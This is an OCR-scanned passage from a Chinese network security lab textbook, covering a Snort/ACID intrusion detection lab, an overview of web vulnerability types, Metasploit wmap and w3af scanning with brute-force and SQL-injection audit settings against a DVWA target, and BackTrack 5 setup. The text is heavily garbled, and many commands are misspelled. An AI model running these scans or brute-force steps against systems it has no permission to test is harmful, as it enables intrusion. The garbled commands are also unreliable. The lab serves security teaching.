include $RULE PATH/telnet.rules 


Minclude $RULE PATH/rpc.rules 
Hinclude $RULE_PATH/rservices.rules 
#include $RULE_PATH/dos.rules 
include $RULE_PATH/ddos.rules 
include $RULE_PATH/dns.rules 
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2. 使 用 控制 台 查 看 检测 结果 
打开 http://localhost /acid/acid_main. php 网 页 , 启 
台 主 界面 ,如 图 7. 3.2 所 示 。 


动 Snort 并 打开 ACID 检测 控制 


I XD RRO 查看 MRA 快捷 组 (G) AMO) IAD SOW WR) 
|0- 09-06-3286 d-«-Em- ma Gi m- 3B m 
[ith (8) hetp:77127.00.1:50080/ecd/acid_man php — Ea jea 


16 由 Windows Media @) Windows SR Hotmail e) Be 
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® Source IP addresses: 41 
* Dest. IP addresses: 108 
® Unique IP links 196 





@ Source Ports: 752 aroen EO QOO 


© TCP ( 749) UDP 
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@ Dest, Ports: 19 
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图 732 Short 控制 台 页 面 


单 击 图 示 中 TCP 后 的 数字 80 26 ,将 显示 所 有 检测 到 的 TCP 协议 日 志 的 详细 情况 ,如 
图 7.3.3 所 示 。TCP 协议 日 志 网 页 中 的 选项 依次 为 流量 类 型 .时 间 戳 、. 源 地 址 .目标 地 址 以 
及 协议 。 由 于 Snort 主机 所 在 的 内 网 为 202. 112. 108.0, 可 以 看 出 ,日 志 中 只 记录 了 外 网 IP 
对 内 网 的 连接 ( 即 目标 地 址 均 为 内 网 )。 

选择 控制 条 中 的 home 返回 控制 台 主 界面 .在 主 界面 的 下 部 有 流量 分 析 及 归 类 选项 ,如 
图 7.3.4 所 示 。 

选择 “last 24 hours:alerts unique”, 可 以 看 到 24 小 时 内 特殊 流量 的 分 类 记录 和 分 析 。 
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图 733 Short 结果 检测 页 面 
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® Snapshot 
* Most recent Alerts: any protocol TCP, ® Most frequent 5 Alerts 
UDP, ICMP 


* Today's: alerts unique, listing, IP src / * Most Frequent Source Ports: any , TCP , UDP 


dst * Most Frequent Destination Ports: any , TCP , UDP 
* Last 24 Hours: alerts unique, listing, IP 


src / dst " | 
© Last 72 Hours: alerts unique, listing; IP * Most frequent 15 addresses. source, destination 

src / dst | 
* Most recent 15 Unique Alerts 


@ Last Source Ports: any , TCP , UDP 
* Last Destination Ports. any , TCP , UDP 
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734 Short 控制 全 检测 页 面 





表 中 详细 记录 了 各 类 型 流量 的 种 类 、 在 总 日 志 中 所 占 的 比例 .出 现 该 类 流量 的 起 始 和 终止 时 
间 等 详细 分 析 ( 在 控制 台 主 界面 中 还 有 其 他 功能 ,请 自己 练习 使 用 ) 。 

3. 配置 snort 规则 

练习 添加 一 条 规则 ,以 对 符合 此 规则 的 数据 包 进 行 检测 ,打开 Ci \snort\ rules\ local 
.rules 文件 ,如 图 7. 3.5 所 示 。 





ij \ocal.rules 本 -|o|x 
文件 全 MAE) 格式 (2) MMH) 


# This file intentionally does not come with signatures. Put your local 
# additions here. 





图 735 Short 规则 编辑 文件 


在 规则 中 添加 一 条 语句 ,实现 对 内 网 的 UDP 协议 的 相关 流量 进行 检测 ,并 生成 报警 信 
息 “udp ids/dns-version-query”, 语 句 如 下 : 


alert udp any any < > $ HOME NET any (msg:"udp ids/dns- version- query";content: 
"version"; ) 


保存 文件 后 退出 。 重 启 Snort 和 ACID 检测 控制 台 ,使 规则 生效 。 
实验 报告 要 求 

。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 


。 阐述 遇 到 的 问题 以 及 解决 方法 。 
阐述 收获 与 体会 。 
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第 8 音 Web 漏洞 渗透 实验 


8.1 Web 漏洞 概述 


Web 漏洞 通常 是 指 网 站 程序 上 的 漏洞 ,常见 的 Web 漏洞 可 以 分 为 以 下 几 种 。 

(OD 物理 路 径 泄露 : 物理 路 径 泄露 一 般 是 由 于 Web 服务 器 处 理 用 户 请 求 出 错 引 起 的 。 
例如 ,通过 提交 一 个 超 长 的 请 求 , 或 者 是 某 个 精心 构造 的 特殊 请 求 ,或 者 是 请 求 一 个 Web 服 
务 器 上 不 存在 的 文件 ,都 可 能 导致 错误 出 现 。 这 些 请 求 都 有 一 个 共同 特点 , 那 就 是 被 请 求 的 
文件 肯定 属于 CGI 脚本 ,而 不 是 静态 HTML 页 面 。 还 有 一 种 情况 ,就 是 Web 服务 器 的 某 
些 显示 环境 变量 的 程序 错误 地 输出 了 Web 服务 器 的 物理 路 径 , 当 然 这 属于 设计 上 的 问题 。 

(2) CGT 源 代码 泄露 : CGI 源 代码 泄露 的 原因 比较 多 ,例如 大 小 写 、 编 码 解码 、 附 加 特 
殊 字符 或 精心 构造 的 特殊 请 求 等 ,都 可 能 导致 CGI 源 代码 泄露 。 

(3) Ho pg: 目录 遍历 对 于 Web 服务 器 来 说 并 不 多 见 ,通过 对 任意 目录 附加 “.. /”， 
或 者 是 在 有 特殊 意义 的 目录 附加 “../”, 或 者 是 附加 “../” 的 一 些 变形 ,如 “..\" 或 “..//” 其 
至 其 编码 ,都 可 能 导致 目录 遍历 。 前 一 种 情况 并 不 多 见 ,但 是 后 面 的 几 种 情况 就 常见 得 多 ， 
IIS 二 次 解码 漏洞 和 Unicode 解码 漏洞 都 属于 在 编码 基础 上 进行 修改 导致 的 。 

(4) 执行 任意 命令 : 执行 任意 命令 是 指 执行 任意 操作 系统 命令 ,主要 包括 两 种 情况 : 一 
种 情况 是 通过 遍历 目录 ,如 前 面 提 到 的 使 用 二 次 解码 和 Unicode 解码 漏洞 来 执行 系统 命令 ; 
另外 一 种 情况 是 Web 服务 器 把 用 户 提交 的 请 求 作 为 SST 指令 解析 ,因此 导致 执行 任意 
命令 。 

(5) 缓冲 区 溢出 : 缓冲 区 溢出 漏洞 是 Web 服务 器 没有 对 用 户 提交 的 超 长 请 求 进行 合适 
的 处 理 , 这 种 请 求 可 能 包括 超 长 URL、 超 长 HTTP Header 域 或 者 其 他 超 长 的 数据 。 这 种 
漏洞 可 能 导致 执行 任意 命令 或 者 是 拒绝 服务 ,一 般 取决 于 构造 的 数据 。 

(6) 拒绝 服务 : 拒绝 服务 产生 的 原因 多 种 多 样 ,主要 包括 超 长 URL、 特 殊 目 录 、 超 长 
HTTP Header Jak HI HTTP Header 域 或 者 DOS 设备 文件 等 。 由 于 Web 服务 器 在 处 理 
这 些 特 殊 请 求 时 不 知 所 措 或 者 是 处 理 方式 不 当 , 因 此 出 错 终止 或 挂 起 。 

(7) 条 件 竞争 : 这 里 的 条 件 竞 争 主要 是 针对 一 些 管理 服务 器 而 言 , 这 类 服务 器 一 般 是 
以 System 或 Root 身份 运行 的 。 当 它们 需要 使 用 一 些 临时 文件 ,而 对 这 些 文件 进行 写 操作 
之 前 却 没有 对 文件 的 属性 进行 检查 ,这 样 可 能 导致 重要 系统 文件 被 重 写 ,甚至 获得 系统 控 
制 权 。 

(8) 跨 站 脚本 执行 漏洞 : 由 于 网 页 可 以 包含 由 服务 器 生成 的 并 且 由 客户 机 浏览 器 解释 
的 文本 和 HTML 标记 。 如 果 不 可 信 的 内 容 被 引入 到 动态 页 面 中 , 则 无 论 是 网 站 还 是 客户 
机 都 没有 足够 的 信息 来 识别 这 种 情况 并 采取 保护 措施 。 攻 击 者 如 果 知 道 某 一 网 站 上 的 应 用 
程序 接收 跨 站 点 脚本 的 提交 ,他 就 可 以 在 网 页 上 提交 可 以 完成 攻击 的 脚本 ,例如 
JavaScript, VBScript, ActiveX, HTML 或 Flash 等 内 容 , 普 通用 户 一 旦 单 击 了 网 页 上 这 些 
攻击 者 提交 的 脚本 ,就 会 在 用 户 客户 机 上 执行 ,完成 从 截获 账户 .更 改 用 户 设 置 .窃取 和 算 改 
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cookie 到 虚假 广告 在 内 的 种 种 攻击 行为 。 

(9) SQL 注入 : 对 于 和 后 台数 据 库 产生 交互 的 网 页 ,如 果 没 有 对 用 户 输入 的 数据 进行 
合法 性 的 判断 ,就 会 使 应 用 程序 存在 安全 隐患 。 用 户 可 以 在 提交 正常 数据 的 URL. 或 表单 
输入 框 中 提交 一 段 精心 构造 的 数据 库 查询 代码 ,使 后 台 应 用 执行 攻击 者 的 SQL 代码 ,攻击 
者 根据 程序 返回 的 结果 ,获得 某 些 他 想 得 知 的 敏感 数据 ,例如 管理 员 密 码 、 保 密 商业 资料 等 。 


8.2 Web 漏洞 实验 





实验 器 材 


Back Track5 的 镜像 文件 ,1 套 。 
VMware 虚拟 机 软件 ,1 套 。 
PC( Windows XP/Windows 7),1 £. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 web 漏洞 技术 的 有 关内 容 。 
(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 漏洞 产生 的 原因 ,了 解 常见 的 漏洞 攻击 。 

实验 环境 

一 台 安 装 了 VMware 虚拟 机 软件 的 Windows 7 操作 系统 的 计算 机 ,BT5(Back Track 
five) 系 统 。 

预备 知识 

(1) 网 络 漏洞 。 

(2) 漏洞 攻击 原理 。 

实验 步 又 

1. 使 用 Metasploit 内 置 的 wmap web 扫描 器 

wmap web 扫描 模块 允许 使 用 者 使 用 和 配置 Metasploit 中 的 其 他 扫描 辅助 模块 ,来 对 
网 站 进行 集中 扫描 。 

(1) 首先 ,启动 Metasploit。 

root@ bt: ~#msfomsole 


(2) 加 载 wmap 模块 。 


msf> load wrap 
* 180 。 


(3) 使 用 help 命令 查看 帮助 信息 。 


msf> help 
wmap 的 详细 命令 参数 如 下 : 
wrap Commands 


wep vulns Display web vulns 


wmap Commands 介绍 如 下 。 

wmap. modules; wmap 模块 的 管理 命令 。 

wmap_nodes: 管理 模块 的 节点 命令 。 

wmap_run: 对 目标 进行 扫描 的 命令 。 

wmap_sites: 管理 站 点 的 命令 ,将 站 点 添加 到 模块 中 。 
wmap_targets: 管理 目标 的 命令 ,将 添加 的 站 点 作为 扫描 的 目标 。 
wmap. vulns: 展示 网 站 的 vulns。 

(4) 使 用 管理 站 点 命令 ,为 模块 添加 要 扫描 的 站 点 。 


wep sites - a http://202.112.50.74 

设置 后 的 界面 显示 如 下 : 

[* ] Site created. 

设置 的 站 点 IP 地 址 为 http://202. 112. 50. 74。 

(5) 使 用 wmap. sites 的 -1 命令 查看 站 点 的 详细 信息 。 
msf> wep sites - 1 

设置 后 的 查看 站 点 信息 : 


[*] Available sites 


0  202.112.50.74 202.112.50.74 80 http 0 0 


可 以 看 到 ,刚才 添加 的 站 点 为 第 0 号 站 点 ,站 点 和 虚拟 站 点 均 为 202. 112. 50. 74 ,端口 
为 80 端口 ,使 用 的 协议 为 http 协议 。 
(6) 管理 目标 的 命令 将 刚才 添加 的 站 点 设置 为 扫描 的 目标 。 
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msf> wrap targets - t http://202.112.50.74 

(7) 使 用 运行 扫描 目标 命令 中 的 -t 参数 查看 将 有 哪些 模块 被 用 来 进行 扫描 。 
msf> wep nm-t 

设置 后 的 漏洞 扫描 模块 如 下 : 


* ] Testing target: 
* Site: 202.112.50.74 (202.112.50.74) 
* Port: 80 SSL: false 


* ] Testing started. 2016- 05- 27 09:11:25 - 0400 


* ] Loading wrap modules... 
* ] 39 wrap enabled modules loaded. 


* ] Module auxiliary/scanner/http/http version 

* ] Module auxiliary/scanner/http/open proxy 

* ] Module auxiliary/scanner/http/rdbots txt 

* ] Module auxiliary/scanner/http/frontpage login 

* ] Module auxiliary/admin/http/tamcat administration 

* ] Module auxiliary/admin/http/tamcat utf8 traversal 

* ] Module auxiliary/scanner/http/cptions 

* ] Module auxiliary/scanner/http/drupal views user enum 
* ] Module auxiliary/scanner/http/scraper 

* ] Module auxiliary/scanner/http/svn scanner 

* ] Module auxiliary/scanner/http/trace 

* ] Module auxiliary/scanner/http/vhost scanner 

* ] Module auxiliary/scanner/http/webdav intemal ip 

* ] Module auxiliary/scanner/http/webdav scanner 

* ] Module auxiliary/scanner/http/webdav website content 


* ] Module auxiliary/dos/http/apache range dos 

* ] Module auxiliary/scanner/http/backup file 

* ] Module auxiliary/scanner/http/brute dirs 

* ] Module auxiliary/scanner/http/ocpy of file 

* ] Module auxiliary/scanner/http/dir listing 

* ] Module auxiliary/scanner/http/dir scanner 

* ] Module auxiliary/scanner/http/dir webdav unicode bypass 
* 182 * 








Module auxiliary/scanner/http/file same name dir 

Module auxiliary/scanner/http/files dir 

Module auxiliary/scanner/http/http put 

Module auxiliary/scanner/http/ms09 020 webdav unicode bypass 
Module auxiliary/scanner/http/prev dir same name file 
Module auxiliary/scanner/http/replace ext 

Module auxiliary/scanner/http/soap xml 

Module auxiliary/scanner/http/trace axi 

Module auxiliary/scanner/nttp/verb auth bypass 


Module auxiliary/scanner/http/blind sql query 
Module auxiliary/scanner/nttp/error sql injection 
Module auxiliary/scanner/nttp/http traversal 

Module auxiliary/scanner/nttp/rails mass assignment 
Module esploit/miti/http/lams php exec 








从 返回 结果 可 以 看 出 ,总 共有 39 个 模块 参与 到 了 漏洞 的 扫描 中 来 。 
(8) 使 用 运行 扫描 目标 命令 中 的 -e 参数 ,对 目标 站 点 进行 扫描 。 


m wep mn -e 


设置 后 对 目标 站 点 的 扫描 结果 如 下 : 


* 


Lj] 


Using ALL wrap enabled modules. 
NO WP NODES DEFINED. Executing local modules 
Testing target: 

Site: 202.112.50.74 (202.112.50.74) 

Port: 80 SSL: false 








Module auxiliary/scanner/http/http version 


* ] 202.112.50.74:80 Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2- lubuntu4.5 with Suhosin- Path mod_ 
python/3.3.1 Python/2.6.5 mod perl/2.0.4 Perl/v5.10.1 
Module auxiliary/scanner/http/open proxy 

Module auxiliary/scanner/http/rdbots txt 
[202.112.50.74] /rdbots.txt found 

Module auxiliary/scanner/http/frontpage login 

Module auxiliary/admin/http/tamcat administration 
Module auxiliary/acdmin/http/tamcat utf8 traversal 
Module auxiliary/scanner/nttp/options 

Module auxiliary/scanner/http/drupal views user enum 
Module auxiliary/scanner/http/scraper 

Module auxiliary/scanner/nttp/svn scanner 

Module auxi liary/scanner/nttp/trace 


nf DUE HI auxiliary /scanner/http/http. version 模块 扫描 到 的 服务 器 的 信息 包括 : 








WC NR Oe dk e SK. X Oe OMS e OK 


Apache/2.2.14 (Uountu) mod mono/2.4.3 FHP/5.3.2- lubuntu4.5 with Suhosin- Path mod python/3.3.1 Python/2.6.5 
mod perl/2.0.4 Perl/v5.10.1 


auxiliary /scanner/http/robots. txt 模块 同样 扫描 到 robots. txt 文件 ( 即 声 明 禁 止 抓 取 
的 页 面 信息 的 文件 ) 的 存在 。 

wmap web 扫描 器 的 模块 众多 ,可 以 根据 具体 情况 去 特定 模块 下 查找 是 否 有 查找 到 相 
应 的 信息 ,这 里 就 不 一 一 说 明了 。 

2. 使 用 Metasploit 内 置 的 w3af 扫描 器 

w3af(web application attack and audit framework) 是 一 个 Web 应 用 程序 攻击 和 审计 
框架 。 它 的 目标 是 创建 一 个 易于 使 用 和 扩展 、 能 够 发 现 和 利用 Web 应 用 程序 漏洞 的 主体 框 
架 。w3af 的 核心 代码 和 插件 完全 由 Python 编写 。 项 目 已 有 超过 130 个 的 插件 ,这 些 插件 
可 以 检测 SQL 注入 、 跨 站 脚本 、 本 地 和 远程 文件 包含 等 漏洞 。 

目前 w3af 已 经 更 新 至 1.1 版 ,新 版 框架 更 好 、 更 健壮 、 更 高 速 。 它 包含 了 新 的 漏洞 检 
测 ,提升 了 约 15% 的 性 能 。 其 功能 和 特点 如 下 : 

。 支持 代理 。 

。 代理 身份 验证 。 

。 网 站 身份 验证 。 

。 超时 处 理 。 

。 伪造 用 户 代 理 。 

。 新 增 自 定义 标题 的 请 求 。 

。 Cookie 处 理 。 

。 本 地 缓存 GET 和 头 部 。 

* 本 地 DNS 缓存 。 

。 保持 和 支持 HTTP 和 HTTPS 连接 。 

。 使 用 多 POS 请 求 文件 上 传 。 

。 支持 SSL 证 书 。 

(1) 进入 w3af 所 在 文件 夹 。 
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root@ bt: ~# ad /pentest/web/w3af/ 
(2) 查看 文件 夹 下 的 文件 。 
root@ bt: /pentest /web/iGaftt 1s -1 
设置 后 w3af 文件 夹 下 的 文件 详细 信息 如 下 : 


total 52 

drwxr- xr- x 6 root root 4096 2013- 05- 20 10:23 core 
drwxr- xr- x 12 root root 4096 2013- 05- 20 10:23 extlib 
drwxr- xr- x 5 root root 4096 2013- 05- 20 10:23 locales 
drwxr- xr- x 13 root root 4096 2013- 05- 20 10:23 plugins 
drwxr- xr- x 3 root root 4096 2013- 05- 20 10:23 profiles 
drwxr- xr- x 6 root root 4096 2013- 05- 20 10:24 readme 
drwxr- xr- x 3 root. root. 12288 2013- 05- 20 10:23 scripts 
drwxr- xr- x 3 root root 4096 2013- 05- 20 10:21 tools 

— rwxr- xr- x 1 root root 5066 2013- 05- 20 10:24 w3af oonsole 
- rwxr- xr- x 1 root root 3288 2013- 05- 20 10:24 w3af gui 


可 以 看 出 ,在 该 文件 夹 下 有 两 个 可 执行 文件 ,分 别 为 W3af console 和 W3af gui, frx 
件 名 称 就 可 以 很 清楚 明白 这 两 个 执行 文件 的 区 别 , 即 一 个 是 命令 行 执行 方式 ,而 另 一 个 是 使 
用 图 形 界面 执行 方式 。 在 本 次 实验 采用 命令 行 窗口 ,图 形 界面 的 可 以 自行 实践 。 

(3) 使 用 命令 行 窗口 方式 运行 w3af 模块 。 具 体 输入 如 下 : 

root@ bt: /pentest/web/w3af# ./w3af_console 

(4) 同样 ,使 用 帮助 命令 来 查看 模块 的 命令 参数 。 

waaf>>> help 


设置 后 w3af 模块 的 help 菜单 详情 如 下 : 





start | Start the scan. | 
plugins | Enable and configure plugins. | 
exploit | Exploit the vulnerability. | 
Profiles | List and use scan profiles. | 
cleanup | Cleanup before starting a new scan. | 
ES — 
http- settings | Configure the HTTP settings of the framework. | 
müsc- settings | Configure w3af misc settings. | 
target | Configure the target URL | 
back Go to the previous menu. | 
exit Exit w3af | 
assert Check assertion. | 
help Display help. Issuing: help [command], prints more 
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| | specific help about "ommend" | 
| version | Show w3af version information. | 
| keys | Display key shortcuts. | 


(5) 进入 模块 配置 阶段 ,根据 前 面 help 菜单 的 显示 ,使 用 plugins 命令 。 
waaf>>> plugins 

(6) 首先 ,配置 暴力 破解 模块 。 

vGaf/plugins»»» bruteforoe 


设置 后 暴力 破解 模块 bruteforce 参数 列表 如 下 : 


| Plugin name | Status | Conf | Description 

| pag a, es Msg —— ——Ó————— À——————————— — — tr gs we gt a 
| basicAuthBrute | | Yes | Bruteforce HITP basic authentication. | 

| formuthBrute | | Yes | Bruteforce HIML form authentication. | 


(7) 使 用 formAuthBrute 模式 。 


w3af/plugins>>> bruteforce formAuthBrute 
w3af/plugins>>> bruteforœ config fommAuthBrute 


(8) 为 暴力 破解 模块 添加 用 户 名 和 密码 字典 。 

wGaf/plugins/onuteforce/config: fonmmuthBnute>>> set passwiFile True 

w3af/plugins/bruteforce/ccnfig: fomBuithiBrute»»» set usersFile True 

这 样 设置 的 目的 是 ,在 遇 到 需要 账号 密码 认证 的 页 面 时 ,可 以 调用 设置 的 字典 对 认证 页 
面 进行 暴力 破解 。 当 然 ,暴力 破解 可 能 使 得 整个 过 程 变 得 很 慢 。 下面 设置 审计 模块 的 相关 
参数 。 

(9) 先 从 当前 模块 退出 。 

weaf/plugins/bruteforce/config:formmaithBrute>>>back 

(10) 配置 对 xss 和 sql 的 漏洞 扫描 。 

w3af/plugins>>> audit xss, sqli 

这 样 设 置 , 即 是 对 目标 站 点 的 SQL 注入 和 XSS 漏洞 进行 扫描 。 

接 下 来 ,设置 discovery 模块 的 相关 参数 。 

(11) 配置 最 关键 的 webSpider 插件 。 

w3af/plugins>>> discovery webSpider 

weaf/plugins>>> discovery config webSpider 

webSpider ffi {4 A Dy GE Zz IR Wa [d 3 vp BE — 4S GUAT HY) URL, 本 次 实验 为 了 节省 时 间 , 通 
过 onlyForward Zi . TEE UJ] HE BR XE fe fe Us FIA F f PA STL. 
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(12) 设置 onlyForward 参数 为 真 。 
Weaf/pluginsy/discovery/config:webspider>>> set cnlyForward True 
(13) 退出 webSpider 插件 模块 。 

wGaf /plugins/discovery/config:webSpider>>> back 

(14) 退出 设置 模块 。 

wBaf/plugins>>> back 

(15) 进入 target 模块 进行 设置 。 

waaf>>> target 

(16) 设置 本 次 要 扫描 的 目标 站 点 。 
weaf/omfig:target>>> set target http://www.dvssc.oon/dvwa/ index.php 
(17) 退出 target 设置 模块 。 

w3af/anfig:taræt>>> back 

(18) 再 次 进入 plugins 设置 模块 。 

wa>>> plugins 

(19) 设置 扫描 结束 的 输出 文件 类 型 。 


w3af/plugins>>> output htmlFile 
w3af/plugins>>> output config htmlFile 


在 本 次 实验 中 使 用 的 是 HTML 文件 类 型 ,当然 还 有 很 多 类 型 ,读者 可 以 自己 进行 
设 定 。 
(20) 设置 verbose BR. 


w3af/plugins/output/ccnfig:htmlFile»»» set verbose True 

(21) 设置 输出 文件 的 文件 名 。 
wa3af/plugins/output/oonfig:htmlFile>>> set fileName tack.html 
(22) 退出 output 设置 模块 。 
wGaf/plugins/cutput/oonfig:html Fi 1e»»» back 

(23) 退出 plugins 设置 模块 。 

waf/plugins>>> back 


基本 的 设置 已 经 完成 ,下 面 可 以 使 用 start 命令 来 进行 本 次 扫描 了 。 
(24) 使 用 start 命令 开始 扫描 。 


waf>>> start 
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设置 后 w3af 实际 扫描 后 的 详细 信息 如 下 : 

Auto- enabling plugin: grep.passwordProfiling 

Auto- enabling plugin: grep.getMails 

Auto- enabling plugin: grep.lang 

New URL found by webSpider plugin: http://ww.dvssc.can/dvwa/ 


The list of URLs is: 


可 以 看 出 ,扫描 总 共用 时 5 秒 ,基本 信息 通过 刚才 设置 的 html 文件 来 查询 。 
从 w3af 的 文件 夹 中 可 以 看 到 名 为 track. html 的 文件 , 即 在 输出 模块 设置 的 文件 名 ,如 
图 8.2.1 所 示 。 

















plugins profiles readme 

- am 
HEAD 

-d Fa 

scripts tools track.html 

#1/us™ Aius 

m ier 

w3af console w3af gui 








图 821 w8f 模块 扫描 后 输出 trackhtm 文件 


在 浏览 器 中 打开 ,可 以 看 到 扫描 后 的 详细 信息 ,已 经 在 html 文件 中 列 了 出 来 ,如 
图 8.2.2 和 图 8. 2.3 所 示 。 
实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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= 


http://www.dvssc.com/dvwa/index.php | 


Cr 


Vulnerabilityjtcp/80 SQL injection in a MySQL database was found at "http://www.dvssc.com/dvwa/login.php", 
using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login& 
password-FrAmE30.". The modified parameter was "username". This vulnerability was 
found in the request with id 311. 











URL : http:/www.dvssc.com/dvwalogin.php 

Severity : High 

Information |tcp/80 SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", 
using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login& 
password-FrAmE30.". The modified parameter was "username". This vulnerability was 
found in the request with id 311. 

















URL : http://www.dvssc.com/dvwa/login.php 





图 822 tracehtrri 文件 的 详细 信息 (1) 





Fri 27 May 2016 本 
11:33:10 AMEDT debug 。 |Exting setOutputPlugins() 


Fri 27 May 2016 
11:33:11 AM EDT debug Called w3afCore.start() 




















图 823 tracehtri 文件 的 详细 信息 (2) 
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第 9 章 主机 探测 及 端口 扫描 实验 


9.1 Windows 操作 系统 探测 及 端口 扫描 实验 


实验 器 材 

Back Track5 的 镜像 文件 ,1 套 。 
VMware 虚拟 机 软件 ,1 E. 
PC,1 G. 

实验 任务 


一 台 安 装 了 VMware 虚拟 机 软件 的 Windows 7 操作 系统 的 计算 机 ,BT5(Back Track 
five) 系 统 。 


实验 环境 


一 台 安装 Windows 2000/XP 操作 系统 的 计算 机 ,磁盘 格式 配置 为 NTFS, 预 装 MBSA 
(Microsoft Baseline Security Analyzer) 工 具 。 


预备 知识 


(1) ARP 地 址 解析 协议 。 
(2) RARP 道 地 址 解析 协议 。 
(3) ICMP Internet 控制 报 文 协 议 。 


因为 本 次 实验 介绍 的 主机 探测 及 其 端口 扫描 使 用 的 是 Back Track 5 中 的 Metasploit 
开源 工具 ,因此 ,下 面 先 介绍 在 Windows 7 操作 系统 的 计算 机 中 ,使 用 VMware 虚拟 机 软件 


安装 Back Track 5 的 步骤 。 
本 次 实验 使 用 的 VMware 虚拟 机 版 本 为 VMware Workstation 12, 使 用 Back Track 5。 


9.2 Back Track 5 系统 的 安装 


(1) 打开 VMware 虚拟 机 软件 ,出 现 *“ VMware Back Track 5 安装 向 导 ” 窗 口 , 如 图 9. 
2.1 所 示 。 
(2) 单 击 “创建 新 的 虚拟 机 ?选项 ,出 现 * 新 建 虚拟 机 向 导 ? 界 面 , 如 图 9. 2. 2 所 示 , 通 过 
本 向 导 来 创建 一 个 新 的 虚拟 机 。 
(3) 在 配置 类 型 中 ,选择 “ 自 定 义 ( 高 级 )(C)? 单 选项 , 单 击 * 下 一 步 ? 按 钮 ,出 现 如 
* 190 。 





VMware Wor 


SHO EO SEV SNM BRED EQ | ~ Dag 








Men x 
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图 921 安装 向 导 窗口 





欢迎 使 用 新 建 虚拟 机 向 导 
WORKSTATION TrSBIRRL ELLA IRR 
© RAED 


通过 几 个 简单 的 步骤 创建 Workstation 12.0 
虚拟 机 。 


回 演 定 又 (高 级 )Gj 
ARREA SCSI 控制 器 类 型 、 虚 拟 碰 盘 类 型 
ea VMware 产品 兼容 性 等 高 级 选项 




















L7 < 上 (8) | [tno 
Boo FENNAS 界面 














图 9.2. 3 所 示 的 “选择 虚拟 机 硬件 兼容 性 ”界面 。 
CD. 在 “选择 虚拟 机 硬件 兼容 性 ”界面 中 ,选择 默认 的 硬件 兼容 性 , 即 Workstation 12. 0 
的 硬件 兼容 性 , 单 击 “ 下 一 步 ” 按 钮 。 
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图 923 ”选择 虚拟 机 硬件 兼容 性 ” 界面 


(5) 在 出 现 的 如 图 9. 2.4 所 示 的 “安装 客户 机 操作 系统 "界面 中 ,选择 “ 稍 后 安装 操作 系 
统 (S)” 选 项 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 如 图 9. 2. 5 所 示 的 “选择 客户 机 操作 系统 "界面 。 














安装 客户 机 操作 系统 
虚拟 机 如 同 物理 机 ， 需 要 操作 系统 。 您 将 如 何 安装 窜 户 机 操作 系统 ? 





安装 来 源 : 
O 安装 程序 光盘 (D): 
ed vo aes (E) ~ 








O 支 装 程序 光盘 映像 文件 (soXM): 
DARE Fý \kaHnux-2016.1-amd64\kaHnux-2016.1ar -| | EW... | 

















回 稍 后 安装 操 作 系统 (5j。] 
| shes ize 
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924 ‘REEPREAR FA 


(6) 因为 BT5 是 基于 Ubuntu Lucid LTS. Kernel 2. 6.38 的 ,因此 ,在 “选择 客户 机 操作 
系统 ”选项 中 选择 Linux(L) 单 选项 ,而 在 "版 本 ”选项 中 选择 "Ubuntu 64 位 ?选项 , 单 击 " 下 
一 步 "按钮 。 


s. 192. 



































图 925 操作 系统 版 本 选择 


(7) 在 出 现 的 如 图 9. 2.6 所 示 的 “命名 虚拟 机 ?界面 的 “虚拟 机 名 称 (V) "选项 中 输入 为 
虚拟 机 起 的 名 称 , 本 次 实验 使 用 的 是 BT5。 在 "位 置 (L) 选项 中 为 虚拟 机 选择 一 个 安装 目 
录 , 本 次 实验 使 用 的 是 D:\Program Files (x86)\vmware\BT5 安装 目录 , 单 击 “ 下 一 步 ” 
按钮 。 

C AMEN 


命名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 





虚拟 机 名 称 (Y): 
BTS 





fas): 
| D:\Program Fies (x86)\vmware\BT5| 


TUIRIB ">I cO REA FR o 


























Es) [25007] (aaa) 
图 926 “SS eH" RE 











(8) 在 出 现 的 如 图 9. 2. 7 所 示 的 "处 理 器 配置 ?界面 中 ,可 以 根据 自己 实验 平台 的 硬件 
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条 件 , 自 行 决定 “ 处 理 器 数量 (P) ”以 及 “每 个 处 理 器 的 核心 数量 (C)” 的 具体 值 ,本 次 实验 使 
用 的 是 默认 值 , 单 击 “ 下 一 步 ” 按 钮 。 


same __! 


为 此 虚拟 机 指定 处 理 器 孝 量 。 





























图 927 “处理 器 配置 ”界面 


(9) 在 出 现 的 如 图 9.2. 8 所 示 的 “此 虚拟 机 的 内 存 界 面 的 “此 虚拟 机 的 内 存 (M) ?选项 
中 ,同样 可 以 根据 自己 实验 平台 的 硬件 条 件 , 为 虚拟 机 设置 内 存 大 小 。 本 次 实验 选用 的 是 
1024MB, 单 击 “ 下 一 步 ” 按 钮 。 
































您 要 为 此 虚拟 机 使 用 多 少 内 存 ? 
指定 分 醒 给 此 虚拟 机 的 内 存量 。 内 存 大 小 必须 为 4 MB Afat o 
54GB - 此 虚拟 机 的 内 存 (M); 1024 = 
3268 EE 
16GB 
8GB 
pm m 最 大 推荐 内 存 : 
am 4 — 302MB 
1GB a 
512M8 q uidet 
256 MB 1024 MB 
128 MB 
64M8 - 口 客户 机 操作 系统 最 低 推荐 内 存 : 
32MB 512 MB 
16MB 
8MB 
4MB 
(aa) Eis®) (20>) (aa) 





928 虚拟 机 内 存 设置 
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(10) 在 出 现 的 如 图 9. 2. 9 所 示 的 “网 络 类 型 界面 的 “网 络 连接 选项 中 ,为 虚拟 机 选择 
“使 用 网 络 地 址 转换 (NAT)(E) ”模式 , 单 击 “ 下 一 步 ” 按 钮 。 


ReneS = 














© 使 用 桥接 网 络 (R) 
为 客户 机 操作 系统 提供 直接 访问 外 部 以 太 网 网 络 的 权限 。 客 户 机 在 外 部 网 络 上 必须 
ABCA IP 地 址 。 


© 使 用 网 络 地 址 转换 (NA- 
Serna rane 主机 IP 地 址 访问 主机 拨号 连接 或 外 部 以 太 阿 网 络 连 按 的 


O 使 用 仅 主机 模式 网 络 (H) 
